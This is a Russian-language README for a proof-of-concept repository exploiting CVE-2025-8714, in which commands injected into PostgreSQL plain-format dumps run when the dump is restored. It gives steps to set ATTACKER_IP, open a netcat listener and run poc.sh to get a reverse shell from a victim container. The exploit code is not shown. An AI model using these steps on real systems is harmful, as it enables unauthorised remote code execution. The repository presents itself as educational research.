
PoC RCE в PostgreSQL — CVE-2025-8714
PoC RCE в PostgreSQL — CVE-2025-8714
Этот репозиторий представляет собой доказательство концепции (PoC) для критической уязвимости CVE-2025-8714, затрагивающей версии PostgreSQL до: 17.6, 16.10, 15.14, 14.19, 13.22 и 18 Beta ... . Уязвимость позволяет атакующему с правами суперпользователя на исходном сервере внедрять произвольные команды в дамп базы данных, созданный с помощью pg_dump или pg_dumpall в плоском формате. Эти команды выполняются с правами пользователя, восстанавливающего дамп с помощью psql, что позволяет удаленно выполнять код (RCE).
Уязвимость CVE-2025-8714 заключается в том, как PostgreSQL создает и обрабатывает дампы в плоском формате. Пользователь с правами суперпользователя может добавить мета-команды, которые выполняются при восстановлении дампа, что может привести к произвольному выполнению команд в операционной системе.
Этот PoC демонстрирует, как использовать эту уязвимость в среде Docker с PostgreSQL 14.14 для получения обратной оболочки (reverse shell) из контейнера жертвы к атакующему.
nc) для открытия слушателяКлонируйте репозиторий:
git clone https://github.com/orderby99/CVE-2025-8714-POC.git
cd CVE-2025-8714-POC
Отредактируйте poc.sh и замените ATTACKER_IP на IP вашей атакующей машины (где вы откроете netcat).
На вашей атакующей машине запустите слушатель:
nc -lvnp 4444
Запустите PoC:
chmod +x poc.sh
./poc.sh
Вы получите обратную оболочку из контейнера PostgreSQL жертвы.
Использование без разрешения в системах, которые вам не принадлежат, является незаконным и неэтичным.
MIT License — свободное использование для образования и исследований.
Автор: orderby99
Репозиторий для обмена практическими знаниями, чтобы понять, как работают новые уязвимости и как от них защититься.